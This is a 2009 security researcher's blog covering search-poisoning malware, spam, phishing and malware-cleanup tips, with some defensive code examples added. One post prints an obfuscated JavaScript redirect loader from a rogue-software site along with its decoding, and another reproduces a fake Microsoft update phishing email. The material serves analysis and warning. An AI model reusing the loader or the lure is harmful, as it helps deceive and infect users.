Blog for hpHosts, and whatever else I feel like writing about ....

Sunday, 28 June 2009

Full Circle Magazine: Issue 26!

Along with a long-promised site redesign, this month, we’ve got some more FCM goodness in store for you readers.

This month:

- Command and Conquer – MOC & IRSSI
- How To: Ubuntu As A Guest, Apt-Cacher, and Inkscape – Part 3.
- My Story – Why I Converted To Linux.
- Review – WebHTTrack
- MOTU Interview – Stefan Ebner.
- Top 5 – Linux-powered Devices.
- Ubuntu Women, Ubuntu Games, and all the usual goodness!


Get it while it's hot!

Issues 0 - Current



Saturday, 27 June 2009

Google serving Michael Jackson related malware

It should come as no surprise that when a tragedy happens, the criminals online are immediately looking for ways to exploit such. The tragedy of Michael's passing is no different.

I was keeping an eye on Google for the last 48 or so hours to see what would come up, and there's literally a plethora of malware infections waiting for you. For example, let's take the following, which claims;

Michael Jackson (Death Photo) - Vox
26 Jun 2009 ... Blog 15 just almost body Southern Michael Jackson short final Email above ... music Site top Michael dominates Michael Hoax once his -- earlier to buried ... Lombard (Farrah Fawcett Playboy Video)Michael Jackson (Death ... - 17 hours ago

Loading the site shows us that (surprise surprise) it claims to be a video, and tries to make us believe the video has been posted by a real person;

Not surprisingly, if you click on this video, you're taken to a fake AV (vURL Results:;




4. (85K - ac0743191768749085e7806810a7efd4)

Sadly, detection for this particular variant is seriously lacking, with VT showing only 2 vendors detecting it;

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.6.34
Date: Sat, 27 Jun 2009 20:11:40 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Content-Length: 0

HTTP/1.1 302 Found
Date: Sat, 27 Jun 2009 20:11:42 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: schema1=true; expires=Sat, 04-Jul-2009 20:11:42 GMT
Set-Cookie: visited1=5; expires=Sat, 04-Jul-2009 20:11:42 GMT
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

HTTP/1.1 200 OK
Date: Sat, 27 Jun 2009 20:11:39 GMT
Server: Apache/1.3.39 (Unix) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=a3c13dc8d583c237792077cd1c8639c8; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

What is surprising, is that a lot of those I checked (especially the * sites), pointed to sites that had already been shut down.

Either way, this is going to get worse as the days go on, and it should be noted, it's not only search terms associated with Michael Jackson or Farrah Fawcett that are affected - these malicious links are in almost ALL results, irrespective of search terms (start at the last page of the results, that's where they tend to lie).

Be careful out there folks, and ensure you're surfing with ActiveX DISABLED (and unless the site absolutely requires it, scripts should be disabled too, as well as META REFRESH).


ThreatExpert report for the variant mentioned above.

Michael Jackson condolences book (Michael Jackson World Network), have opened a condolences book for those of us that would like to pass on your condolences.

Friday, 26 June 2009

Portable Ubuntu: Got some server space and bandwidth to spare?

I'd completely forgotten about the Portable Ubuntu project until I was researching the reason for the Ubuntu counter being offline again (last went down late last year). Looking through their forums shows they are currently in need of volunteers willing to give up over 600MB (the size of the latest portable version apparently) of space on their server, and of course, the bandwidth to go with it;

Portable Ubuntu is a fantastic choice for Windows users wanting to try out Ubuntu, but don't want the hassle of burning ISOs, or using Wubi etc, as you can just download and run it as you would any other Windows application.

You can find their homepage at;

And a review of it at;

If you've got some space and bandwidth to spare for a wonderfully useful Linux project, please do get in touch with them.

When is a spam/bot filter not enough?

When it's not effective enough of course!

Spam and bot filters have one major flaw, and it's the same flaw that other security related products have - they rely on lists/databases of known offenders. It's great when the offender is in one of the databases, as it means they're instantly blocked, but with the growing trend over the last several years, of criminals hiring out their botnets to spamming gangs (when they aren't doing the spamming themselves of course), these filters have proven to be simply a stop gap - otherwise known as effective until they come along with an IP/e-mail not known to the blacklists.

Take for example,, who are by far the most prolific spammers visiting the Freeware Arena forums. The latest IP they used was, which you'd have thought, given its network, China Unicom Beijing province network, would already be on all of the major blacklists - but alas no, it turns out the IP used, wasn't on any of them.

There are of course, additions you could use, such as Akismet, but experience has shown, incorporating that into custom sites, non-supported CMS systems is a pain. It does however, beg the question - since it's been shown that blacklists and other such filters, are only partially effective, even Akismet doesn't catch it all, what other options are there for us?

One idea I've been pondering, is a heuristic filter, but at present, I'd have no idea how to design such a beast, let alone begin writing one. I'm therefore going to put the question to you - other than blacklists, how do you propose we all go about fighting spam (given most machines serving spam now, are actually drones that are part of a botnet, rather than your average skiddie running XRumer)?

Thursday, 25 June 2009

RIP Michael Jackson: 29.08.1958 - 25.06.2009

I've been a fan of Michael Jackson for well over 20 years, and am extremely saddened to hear of his passing. He was without a doubt, the best entertainer in the world, bar none, and will continue to be for years to come. His music transcended race, gender and pretty much everything else.

Rather than go on about how much of an impression he made on me, and how much I have loved, and indeed, still love his music, I will instead put out a warning.

We all know, when something tragic happens, the bad guys go all out to take as much advantage as they can. Given how well known Michael was, and how many fans he has world wide, it will come as no surprise that they're going to try and take advantage of this situation.

Rather than repeat what has been written, I'll point you to the Eset blog instead;

RIP Michael. I've been a fan of yours for most of my life, and will continue to be for many more years to come.

Foreign Policy Blog network hacked

I came across a rather strange referral to hpHosts earlier - strange because it was coming from, a site that has absolutely no reason to refer to the hpHosts website.

I loaded the site up, and did a search for the word "hphosts", and sure enough, it was highlighted. If we look at the source code for the site, and so far, it only appears to be the defense. that is affected by this, we see a lot of extra code and links, all pointing to; resolves to, which is on the Beltelecom network (AS6697), and is also the same IP that (amongst others) is hosted at.

Given that is still using a very old version of WordPress with known vulnerabilities (according to the source code, they're still using 2.7.1), I think it's pretty safe to say how they were able to get in, when of course this happened, is a different matter (I've not been able to find anything on the many hacker/skiddie forums referencing the site). I'm trying to get in touch with them to get them both cleaned up, and upgraded, I'll report back if I'm successful (and get the ISC involved if I'm not).

As for, nothing new there I'm afraid, it's your typical OEM software scam site.

WhoIs details:

Boris Hinstein
Kalinina str 3-15
Minsk, Minsk 220124

Registered through:, Inc. (
Created on: 19-Sep-02
Expires on: 19-Sep-09
Last Updated on: 26-Sep-08

Administrative Contact:
Hinstein, Boris
Kalinina str 3-15
Minsk, Minsk 220124
375297504299 Fax --

Technical Contact:
Hinstein, Boris
Kalinina str 3-15
Minsk, Minsk 220124
375297504299 Fax --

Domain servers in listed order:

Net-block details:

WhoIs details:

inetnum: -
country: BY
admin-c: DK2210-RIPE
tech-c: IS2093-RIPE
mnt-by: AS6697-MNT
remarks: INFRA-AW
source: RIPE # Filtered

person: Dmitry Komarov
address: 220088, Minsk
address: 55, Zaharova str.,
address: RUE Beltelecom
phone: +375 17 2171799
fax-no: +375 17 2100259
nic-hdl: DK2210-RIPE
mnt-by: AS6697-MNT
source: RIPE # Filtered

person: Ivan Semernik
address: 220088, Minsk
address: 55, Zaharova str.,
address: RUE Beltelecom
phone: +375 17 2171799
fax-no: +375 17 2100259
nic-hdl: IS2093-RIPE
mnt-by: AS6697-MNT
source: RIPE # Filtered

% Information related to ''

origin: AS6697
mnt-by: AS6697-MNT
source: RIPE # Filtered

AS28840 involved in spambot activity

No surprises here I'm afraid, AS28840 is a Russian outfit known as "OAO TATTELECOM" (, with the routes (amongst others);

A little basic research shows the IP that sent me the spam, which I'll get to in a second as it is rather funny, is known to ProjectHoneyPot and flagged by them as "Suspicious";

Given the information at PHP, it looks like a mail server, and I find it very difficult to believe that it's a compromised one, especially given its location (perhaps I'm being too suspicious there? time will tell), and one or two of the other IP blocks owned by this company, have also been involved in malicious activity.

What is rather strange, is that other than the ProjectHoneyPot entry, I couldn't identify any other information referencing as being malicious, though I easily found several references to other net blocks owned by this AS in various places such as,

So what of the e-mail itself? Well in this case, though boring as the tracks stop there, the linky in the e-mail is to - Google (Outlook stripped the HTML, so presumably it didn't originally - one of these days Outlook will actually take notice of the options I've got set).

And yep, the headers are child's play to interpret too, one single fake "From" line, and that's it.

Delivered-To: [REMOVED]
X-FDA: 62387961720
X-Panda: scanned!
X-Filterd-Recvd-Size: 2294
Received: from (unknown [])
by (Postfix) with ESMTP
for <[REMOVED]>; Thu, 25 Jun 2009 17:52:58 +0000 (UTC)
Received: from by; Thu, 25 Jun 2009 20:52:58 +0300 <---FAKE
From: "Joaquin Haney" <>
Subject: About Us
Date: Thu, 25 Jun 2009 20:52:58 +0300
MIME-Version: 1.0
Content-Type: text/plain;
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
Thread-Index: Aca6QC14UYO5I7KFTGN0RMR9IYT63Z==
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.2663
Message-ID: <01c9f5d6$eb861810$b3aa8a4e@iydc>
X-EsetId: 81896726F0AC3331D7CD


hpHosts -

Wednesday, 24 June 2009

Using the ClamAV LiveCD to clean an infected Windows machine

Should you ever get into a situation that finds your computer unable to boot to the desktop due to an infection, or the system boots fine, but doesn't get to the desktop, what do you do? Well, typically, your options are;

1. Format and re-install Windows
2. Remove the hard drive and pop it into a secondary machine as a slave
3. Use a Linux LiveCD to boot and clean the machine

The first option is obviously, not viable for most people as you'd want to backup your documents and such. The second, again, is not viable for most people as not everyone has a secondary machine.

The last option however, is very simple, and can be used by everyone. To save yourself downloading a large file, you can download a much smaller LiveCD specifically for this task, in the form of the ClamAV Live CD by Brandon Perry;

Whilst rather old, this can be updated to use the latest definitions, and we'll go through this in a second. The first thing you need to do once you've downloaded the ISO, is burn it to a CD - I personally suggest ISORecorder for this;

The first screen you will see when booting the CD, is the introduction, for this, simply type clamav and press enter. You'll need to wait a few minutes for it to load, but once loaded you'll be at the command prompt;


Type sudo apt-get update and press return. Again, you'll need to wait a couple of minutes, but once it's finished, you'll be back at the prompt. Next we need to update the ClamAV signatures, to do this, type sudo freshclam and press return.

Next, we need to mount the drive containing your Windows installation. Type each of the following commands, pressing return after each of course.

cd /home
sudo mkdir mnt
sudo mount -t ntfs-3g /dev/sda1 ./mnt

Finally, we need to run the scan (note this will take some time, so grab a coffee, watch a movie, take the dog for a walk or ... you get the idea), to do this, type the following and press return;

clamscan -i -r --remove ./mnt

Note: The author's tutorial for this LiveCD is available in English, German or Polish at, his blog also documents a script you can use (on Linux obviously, no such beast yet exists for Windows) to update the LiveCD .ISO automagically via cron.

As an aside, I do actually generally recommend people surf the internet using a Linux LiveCD anyway as it makes it much harder to infect your Windows system (there is malware out there for Linux, make no mistake, but nowhere near as much as there is for Windows, due mainly to Windows' popularity). You don't even need to boot the system with the CD, you can use MobaLiveCD instead (though bear in mind, this is MUCH slower, tends to require A LOT of RAM, and tends to hate trying to run large (over 150MB) ISOs; I've had the most success with it using DamnSmallLinux).

Tuesday, 23 June 2009

Notification of possible downtime

You may have noticed the network was down earlier, sadly this notification didn't come through until after I'd got it back online again, so I wasn't aware PlusNet were doing any work.

The following therefore, is a notice that there may be additional downtime for the,, sites whilst they carry out the work referenced;

Monday, 22 June 2009

Essential Maintenance: hpHosts server

Just a note folks, the hpHosts server is going offline in approx 2 minutes time for essential maintenance. Please accept my apologies for the disruption. It will be back online within 30-45 mins.

/edit 06:40

She's back folks (she was in dire need of cleaning and replenishment of the coolant gel). Apologies again for the inconvenience.

On the subject of blog spam ......

.... though technically not blog spam, one of the sites I look after, had the following submitted to the guestbook (good thing I wrote a filter for it huh?) a few minutes ago;

Reason for message: BLACKLISTED USER guestbook submission notification
Server address: [REMOVED]
Referring page: [REMOVED]
Date submitted: 23 June 2009
Time submitted: 02:08:04
Submitted by: Helen < >
Posters IP:
Name: Helen
Private?: False

that bring bloodthe blood are open.
<a>order viagra here<a>state the penis isarteries going toblood can enter the[]order viagra online[url]then gets trapped inelongates and

In case you're wondering, our dear spammer is apparently coming from (apparently a US based ISP - never heard of them myself).

You're probably wondering;

1. Why I am writing about this
2. Why I didn't have it block anything with A HREF or BBCode

Well, to answer #1, I thought it was funny, especially given this particular spam doesn't lead to a YouTube video, which I was actually expecting - but leads to a profile that links to (IP:, registered to Nexton Limited in the Ukraine, and hosted by MoskvaCom Ltd in Russia (AS2118), who also host (IP:

Our dear spammer however, is also known for something a little worse than meds spam - rogue crapware. Looking at ProjectHoneyPot shows references to a fake WordPress blog (I say fake because I've got a few other sites listed that are hosted on the same IP block) at Looking at the source code, shows a reference to a .JS file;

vURL Online -

This returns some rather interesting code;

var str=["336", "333", "332", "332", "332", "441", "420", "437", "355", "435", "434", "441", "384", "371", "382", "336", "333", "332", "332", "332", "425","440", "433", "422", "439", "428", "434", "433", "355", "434", "420", "420", "442", "426", "424", "434", "440", "437", "444", "444", "441", "440", "363","436", "440", "424", "437", "444", "364", "446", "336", "333", "332", "332", "332", "332", "442", "428", "433", "423", "434", "442", "369", "431", "434", "422", "420", "439", "428", "434", "433", "384", "362", "427", "439", "439", "435", "381", "370", "370", "434", "433", "431", "428", "433", "424", "425", "440", "437", "433", "428", "439", "440", "437", "424", "375", "440", "369", "428", "433", "425", "434", "370", "438", "440", "439", "437", "420", "370", "428", "433", "369", "422", "426", "428", "386", "373", "371", "361", "435", "420", "437", "420", "432", "424", "439", "424", "437", "384", "362", "355", "366", "355", "436", "440", "424", "437", "444", "355", "366", "355", "362", "361", "440", "437", "384", "372", "361", "395", "407", "407", "403", "418", "405", "392", "393", "392", "405", "392", "405", "384", "438", "434", "425", "439", "442", "420", "437", "424", "438", "439", "434", "437", "444", "418", "426","420", "432", "424", "438", "362", "382", "336", "333", "332", "332", "332", "448"];

var temp='';
var gg='';
for (i=0; i<str.length; i++){

If we decode this, we see;

var pov=0;
function oaawgeouryyvu(query){
window.location='&parameter=' + query + '&ur=1&HTTP_REFERER=softwarestory_games';
}

If we remove ' + query + ', we see it redirects us to;

To answer #2, I don't get anywhere near as many infected or spammy e-mails as I used to, so I've got to try and keep some of my fun.
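The decoding step in this post can be done statically, without ever running the script. The following is an added example (not the code served by the site and not the author's own tooling): it assumes every array value is a character code plus one constant offset, which is what this array uses, and recovers that offset by requiring every decoded character to be tab, CR, LF or printable ASCII. The function names are hypothetical, and the sample input is the first 15 values of the array shown above.

```javascript
// Static decoder for "array of shifted character codes" obfuscation.
// Assumption: every value is (character code + one constant offset).

// Tokens that suggest a candidate decoding really is JavaScript.
const JS_HINTS = /\b(?:var|function|window|document|location|return|eval|http)\b/g;

// Tab, LF, CR and printable ASCII are the only characters expected in script text.
function isPlausibleChar(code) {
  return code === 9 || code === 10 || code === 13 || (code >= 32 && code <= 126);
}

function decodeWithOffset(nums, offset) {
  return nums.map((n) => String.fromCharCode(n - offset)).join('');
}

// Try every offset that keeps ALL decoded values plausible; best guess first.
// Nothing is evaluated: the result is plain text for an analyst to read.
function deobfuscate(values) {
  const nums = values.map(Number);
  if (nums.length === 0 || nums.some((n) => !Number.isInteger(n))) {
    throw new TypeError('expected a non-empty array of integers or digit strings');
  }
  const lo = Math.max(...nums) - 126; // largest value must decode to <= '~'
  const hi = Math.min(...nums) - 9;   // smallest value must decode to >= TAB
  const results = [];
  for (let offset = lo; offset <= hi; offset++) {
    if (!nums.every((n) => isPlausibleChar(n - offset))) continue;
    const text = decodeWithOffset(nums, offset);
    const score = (text.match(JS_HINTS) || []).length;
    results.push({ offset, text, score });
  }
  // Several offsets can survive on short inputs; rank them by keyword hits.
  return results.sort((a, b) => b.score - a.score);
}

// Make any URL in the decoded text non-clickable before it goes into a report.
function defang(text) {
  return text.replace(/\bhttp(s?):\/\/([^\s'"<>]+)/gi,
    (match, s, rest) => 'hxxp' + s + '://' + rest.replace(/\./g, '[.]'));
}

// First 15 values of the array shown in this post.
const PAGE_PREFIX = ['336', '333', '332', '332', '332', '441', '420', '437',
  '355', '435', '434', '441', '384', '371', '382'];

const best = deobfuscate(PAGE_PREFIX)[0];
console.log(best.offset, JSON.stringify(defang(best.text)));
```

The carriage return, line feed and tabs at the start of the array are what pin the offset down to a single value here; on inputs without control characters, check the lower-ranked candidates as well.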


Spambot Search Tool - /

hpHosts -

hpHosts -

Spambot Search Tool: One or two notables

This is just a follow up concerning the latest release of the SBST. Unfortunately I completely forgot to mention a couple of things concerning the latest release. Firstly, if a match is found in one of the databases when using check_spammers_plain.php, it will NOT check the rest of the databases as I didn't see there was really much point (it also speeds up the script).

Secondly, and thanks to Derek for reminding me, although I mentioned $CheckFSL and $CheckSFS being changed, I forgot to mention that you will need to update these variables in your config.php if you're already using the SBST. If you do not change these to $bCheckSFS and $bCheckFSL respectively, the SBST will NOT check either fSpamlist or StopForumSpam.

hpHosts - UPDATED June 22nd, 2009

hpHOSTS - UPDATED June 22nd, 2009

The hpHOSTS Hosts file has been updated. There is now a total of 67,514 listed hostnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 22/06/2009 19:18
  2. Last Verified: 22/06/2009 17:00
Download hpHosts now!

Alas as a side note, the current version of PGP I've got doesn't seem to have a "just sign the damn thing" option, so it seems to be signing the file, but including a copy of the file in the signature - hence the larger file sizes. I've been right through the documentation and can't find an option to get it not to do this. The trial version expires in 4 days anyway though so I'm going to see if I can dig out the previous version I was using.

Friday, 19 June 2009

FAIL: "Microsoft has released an update for Microsoft Outlook"

There's been a whole host of these recently, so this one is nothing new - except that in this case, only 1 out of those he's seen, actually resolves.

In case it was just a case of his DNS server not having the IPs yet, I ran the hostnames he listed through hpObserver, and the results showed exactly the same thing. In this case, the one that does resolve, is quite obviously a part of a botnet, and not surprisingly, consists mainly of home DSL lines by the looks of it.

hpObserver results are at;

This email looks like it's from Microsoft, but it is really intended to load a trojan onto your PC:
From: Microsoft Customer Support []
Sent: 18 June 2009 22:47
Subject: Microsoft has released an update for Microsoft Outlook

Critical Update

Update for Microsoft Outlook / Outlook Express (KB910721)
Brief Description
Microsoft has released an update for Microsoft Outlook / Outlook Express. This update is critical and provides you with the latest version of the Microsoft Outlook / Outlook Express and offers the highest levels of stability and security.
• To install Update for Microsoft Outlook / Outlook Express (KB910721) please visit Microsoft Update Center:[redacted]
Quick Details
• File Name: officexp-KB910721-FullFile-ENU.exe
• Version: 1.4
• Date Published: Thu, 18 Jun 2009 16:46:55 -0500
• Language: English
• File Size: 81 KB
System Requirements
• Supported Operating Systems: Windows 2000; Windows 98; Windows ME; Windows NT; Windows Server 2003; Windows XP; Windows Vista
• This update applies to the following product: Microsoft Outlook / Outlook Express
Contact Us
© 2009 Microsoft Corporation. All rights reserved. Contact Us |Terms of Use |Trademarks |Privacy Statement


Thursday, 18 June 2009

vURL Online: Bug fixes and problems

Oh the joys ..... you spend ages writing code, functions for that code, testing, re-testing, re-writing, re-testing again - and all goes perfectly. Then out of the blue, problems that weren't there before, suddenly start appearing as if out of nowhere.

This is what seems to have happened lately to the vURL Online service - several issues have arisen that weren't there previously (or if they were, they didn't show up during testing).

I've now fixed the following issues, and would appreciate your pointing me to any more that you notice;

1. PhishTank returns Bad Request instead of result

This one seems to be sporadic, and I know the cause for this - PhishTank wants the URL not only Base64 encoded, but also URL encoded in cases where the URL contains an "=" - which is fair enough. However, sometimes it is returning a Bad Request error even when the URL is properly formatted.

I think I've fixed this (have tested since, and not noticed it re-appearing), but let me know if you notice the PT results saying Bad Request, instead of Listed or Not Listed.

2. hpHosts announcing a host was listed, when in fact it was actually only listed with the www. prefix

This was actually a pretty easy fix as it wasn't a problem with vURL itself, but with the fuzzy matching I was having the hpHosts query perform. I've disabled fuzzy and partial matching, so it will only return true if the domain itself is listed, and not if the domain is listed but ONLY with the "www." prefix.

3. Headers and body not properly split from each other

Again, this is due to the functions I had it perform. I've re-written the function so it now properly splits the headers from the actual source code (this is actually having to be done because I can't seem to find a method to have cURL enclose the headers in "[HEADERS]", separate from the body as the proxy script returns both in the same result (I could have it perform two requests so they're obtained separately, but I'm trying to have as little overhead as possible to speed things up)).

4. Links not properly detected and returned

The function I wrote for this was actually working perfectly, what was actually happening is that these results were not then being passed back to the main processor for formatting and display. I've no idea what has caused this, and have spent over 3-4 hours scouring the code, but have had to write a work-around instead.

5. User Agent selection

This was not actually a bug, just missing UA's in the UA dropdown list. I've now added a few more to it, namely, MAC (Safari) UA's.
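Item 3 is easy to get wrong when redirects are followed, because the fetched result then holds one header block per hop before the final body, as in the 302, 302, 200 chain in the 27 June post. The following is an added example of a splitter that handles that case (it is not vURL's code; the function names are hypothetical, and the sample response, including its Location targets, is constructed).

```javascript
// Parse one "status line + header lines" block into a status code and header pairs.
// Headers stay in an ordered list because names such as Set-Cookie can repeat.
function parseHeaderBlock(block) {
  const lines = block.split(/\r?\n/);
  const statusMatch = /^HTTP\/\d(?:\.\d)? (\d{3})/.exec(lines[0]);
  const headers = [];
  for (const line of lines.slice(1)) {
    const colon = line.indexOf(':');
    if (colon > 0) {
      headers.push([line.slice(0, colon).trim().toLowerCase(), line.slice(colon + 1).trim()]);
    }
  }
  return { status: Number(statusMatch[1]), statusLine: lines[0], headers };
}

// Peel header blocks off the front for as long as the remainder starts with a
// status line; whatever is left is the body, blank lines and all.
// Caveat: a body that itself begins with "HTTP/1.x NNN" would be misread.
function splitResponse(raw) {
  const hops = [];
  let rest = raw;
  while (/^HTTP\/\d(?:\.\d)? \d{3}[^\r\n]*\r?\n/.test(rest)) {
    const sep = /\r?\n\r?\n/.exec(rest);
    if (!sep) { // headers were cut off before the blank line: no body at all
      hops.push(parseHeaderBlock(rest.replace(/\r?\n$/, '')));
      rest = '';
      break;
    }
    hops.push(parseHeaderBlock(rest.slice(0, sep.index)));
    rest = rest.slice(sep.index + sep[0].length);
  }
  return { hops, body: rest };
}

// All values of one header on a hop (case-insensitive name).
function headerValues(hop, name) {
  return hop.headers.filter(([n]) => n === name.toLowerCase()).map(([, v]) => v);
}

// One line per hop: where it redirected to and which cookies it set.
function summariseChain(hops) {
  return hops.map((hop) => ({
    status: hop.status,
    location: headerValues(hop, 'location')[0] || null,
    cookies: headerValues(hop, 'set-cookie').map((v) => v.split('=')[0]),
  }));
}

// Constructed sample: three hops, then a body that contains a blank line.
const SAMPLE_RESPONSE = [
  'HTTP/1.1 302 Moved Temporarily',
  'Server: nginx/0.6.34',
  'Location: http://hop2.example.invalid/',
  'Content-Length: 0',
  '',
  'HTTP/1.1 302 Found',
  'Server: Apache/1.3.41 (Unix) PHP/5.2.5',
  'Set-Cookie: schema1=true',
  'Set-Cookie: visited1=5',
  'Location: http://landing.example.invalid/',
  '',
  'HTTP/1.1 200 OK',
  'Content-Type: text/html',
  '',
  '<html><body>',
  '',
  '<p>landing page</p></body></html>',
].join('\r\n');

console.log(summariseChain(splitResponse(SAMPLE_RESPONSE).hops));
```

Splitting once on the first blank line would file the second and third header blocks under "body", which is the symptom described in item 3.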

Check out vURL Online at:

vURL currently uses an MDB to store the URL's and such being requested, due to the size of the current DB, this is going to be changed to MySQL in the coming months (or when I get around to it - MySQL isn't currently installed on the vURL server, so I'll have to do that, then configure it, then re-write the vURL site to use MySQL instead of MDB).

Nine Ball: Juggling with VirusTotal

There’s been some media interest in an alert from WebSense about something they call Nine Ball (he, said, trying to keep his sense of humour in check). It has some pretty interesting characteristics. I’d like to pick up, though, one point that the reports I’ve seen have rather overstated.

WebSense mentioned that vendor detection is low on a Trojan Loader and a malicious PDF. This is true, or was at one point in time, in the sense that a PDF sample submitted to VirusTotal resulted in a report indicating that only three vendors identified it as malicious. Well, actually, even that isn’t quite accurate: two of those hits seem to be a generic packer/javascript detections rather than identification of the file as malicious in its own right. (Similarly, most of the Trojan Downloader detections are generic, and one simply says "suspicious".)

This industry is divided on whether detection purely on packer signature is a good idea. Some vendors flag almost all packed malware as malicious, packed or suspicious: this is because malware distributors use packers, obfuscators and protectors to make it more difficult for security software to recognize code that would otherwise be identified as known malicious code.

The problem is that a fair number of developers use the same tools (in some cases tools specifically developed for malicious purposes) to protect legitimate applications from disassembly and so on, as a Digital Rights Management (DRM) strategy. Well, that’s what they tell us. For this reason, some vendors don’t automatically detect packed apps as malicious, for the benefit of those to whom avoiding false positives may be as important as high detection rates. (Strangely enough, some organizations find FPs a very significant problem. Of course, all companies do if an innocent and widely used file such as a Windows system file is misidentified as malicious.)

Note, however, that high detection rates and low false positive rates aren’t mutually incompatible. Products that don’t generally detect packers as automatically malicious (we don’t, with some exceptions) may well detect packed code anyway, using custom unpackers and other techniques such as emulation. So where’s the problem with VirusTotal? Well actually, the problem isn’t with VirusTotal (or rather with Hispasec, who provide the free VirusTotal service), but with the way that it’s used.

Additional references:

Opera users beware!

I read about this a couple of days or so ago, and am glad I'm not the only one that thinks this is a really bad decision on Opera's part. Browsers should NEVER EVER EVER EVER have a server built into them!

Botnet owners unite!

Opera has introduced a new feature called “Unite” that will allow users to turn their browsers into servers. It’s a concept that might be as well-thought-out as sending customers on a hike in a safari park with backpacks full of raw meat.

According to the Opera Unite Developer’s Primer, “Opera Unite features a Web server running inside the Opera browser, which allows you to do some amazing things.” We’re betting there are some other people who use the Internet who will be doing some amazing things with this too.

Unite is basically a group of extensions to the Opera Web browser widget system. They will make it possible for Opera users to set their machines up as servers to provide their friends with blogs or access to files. Opera’s servers will serve up pages for the “Turbo” feature and act as proxies (with firewall) for the communication between the users’ Unite-linked browsers. Opera staff will check for bugs and malcode. Adult material is not allowed.

The most significant question that arises is: Will users accidentally give unintended access to their file systems? Opera programs are really widgets. Shortcuts have been provided for configuring what they can access. Some shortcuts lead to system folders. There are warnings included in the documentation, but, ultimately what is exposed is left to the developer

Wednesday, 17 June 2009

25th Anniversary - Congrats Kev!

I am extremely happy to announce the 25th anniversary of one of my favourite comedians (it's not his fault he's Australian ;o)), Kevin 'bloody' Wilson. I'll not post the e-mail I received from them about this (had to send a small rant as the link they sent me to the site, was not a link to the domain - but a TinyURL err, URL - Short URL's should NEVER be used in e-mails - ever! (and yes, that includes sURL)), instead, I'll just post a link to the 'Jenny Talia' site instead. - Video of the week - Congratulations dad!

Note: if you've got scripts + ActiveX enabled, be warned, she's embedded the YouTube video in her blog (GRRRR!)

I don't need to mention, those of you familiar with Kev and Jenny, will already know not to have the kids about when you view this - it's 18+ only folks! (nope, no pornographic pictures - just think Billy Connolly with a lot of extra lewdness!)

Kev's own site can be found at;

Not sure who he is? Go read about him;

His online radio is here;

FireEye: Killing the beast .... Part II

These articles were published back in December 2008 but most of the details are still valid for the newer versions.

Back to the CnC structure ... Koobface relies mostly on domain names to locate its CnC servers, instead of using hard coded IPs like Pushdo. As a matter of fact, I observed that it tends to change its CnC domains more often than the IPs behind those domains change. Based on my lab data (for the last 3 months or so) I see Koobface connecting to 23 unique domains.

Here is the complete list:

Surprisingly, when I count the collective IPs behind all these domains, I hardly find 4 unique IPs. Multiple domains have been resolving to these fixed IPs over the period I examined.


Malware: Your friend invited you to Twitter!

I don't use Twitter myself, don't have a need for it, so was surprised to see the following arrive in my inbox as it instantly aroused my suspicion - Twitter have no need to e-mail me, and certainly have no need to send me any files.

Alas as you've probably guessed, and I already knew, it wasn't from Twitter. This one is from some jackass ( - that obviously doesn't know enough about trying to infect people, to either change icons, use a packer, or even try a bit harder to hide the real file type - they just tried disguising it using "document.chm{lots of spaces}.exe" - child's play stuff (little note my dear malware guy, this doesn't really work when you've sent in a zip file - the zip shows the real extension without my having to look for it).
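A mail or archive filter can flag the "document.chm{lots of spaces}.exe" disguise from the entry name alone. The following is an added example of such a check (not the author's code; the function name, the extension lists and the sample names are assumptions made for illustration). It goes slightly beyond the case above by also flagging unpadded double extensions and bidirectional-override characters.

```javascript
// Extensions Windows will execute, and document-style extensions used as decoys.
// Both lists are illustrative, not exhaustive.
const EXECUTABLE_EXTS = new Set(['exe', 'scr', 'pif', 'com', 'bat', 'cmd', 'cpl',
  'vbs', 'js', 'jse', 'wsf', 'hta', 'lnk']);
const DECOY_EXTS = new Set(['chm', 'doc', 'docx', 'xls', 'xlsx', 'pdf', 'txt',
  'rtf', 'jpg', 'jpeg', 'png', 'gif', 'htm', 'html']);

// Inspect one attachment or archive entry name and explain why it looks disguised.
function inspectAttachmentName(name) {
  // Archive entries may carry a path; only the last component matters.
  const base = String(name).split(/[\\/]/).pop();
  const reasons = [];

  // Bidi controls can visually reverse part of the name.
  if (/[\u202a-\u202e\u2066-\u2069]/.test(base)) reasons.push('bidi-control');

  // Windows ignores trailing dots and spaces, so drop them before parsing.
  const trimmed = base.replace(/[\s.]+$/, '');

  // stem, optional whitespace padding, then the extension the OS will act on.
  const m = /^(.*?)([\s\u200b]*)\.([A-Za-z0-9]{1,8})$/s.exec(trimmed);
  if (!m) {
    return { name: base, realExtension: null, decoyExtension: null,
      paddingLength: 0, executable: false, reasons, suspicious: reasons.length > 0 };
  }

  const [, stem, padding, ext] = m;
  const realExtension = ext.toLowerCase();
  const executable = EXECUTABLE_EXTS.has(realExtension);

  // Does the part before the padding end in a harmless-looking extension?
  const decoyMatch = /\.([A-Za-z0-9]{1,8})$/.exec(stem);
  const decoy = decoyMatch ? decoyMatch[1].toLowerCase() : null;
  const decoyExtension = decoy !== null && DECOY_EXTS.has(decoy) ? decoy : null;

  if (executable && padding.length > 0) reasons.push('whitespace-padded-extension');
  if (executable && decoyExtension !== null) reasons.push('double-extension');

  return { name: base, realExtension, decoyExtension,
    paddingLength: padding.length, executable, reasons, suspicious: reasons.length > 0 };
}

// Constructed sample shaped like the name described in this post.
const PADDED_SAMPLE = 'document.chm' + ' '.repeat(60) + '.exe';
console.log(inspectAttachmentName(PADDED_SAMPLE).reasons);
```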

Exported by: Outlook Export v0.1.6

From: [ - Resolution failed ]
Date: 17/06/2009 16:49:09
Subject: Your friend invited you to twitter!

Text Version
* Skip past navigation
* On a mobile phone? Check out <> !
* Skip to navigation
* Skip to sign in form

Select Language ... English Japanese <>

Your friend invited you to twitter!

Your friend invited you to twitter!<>

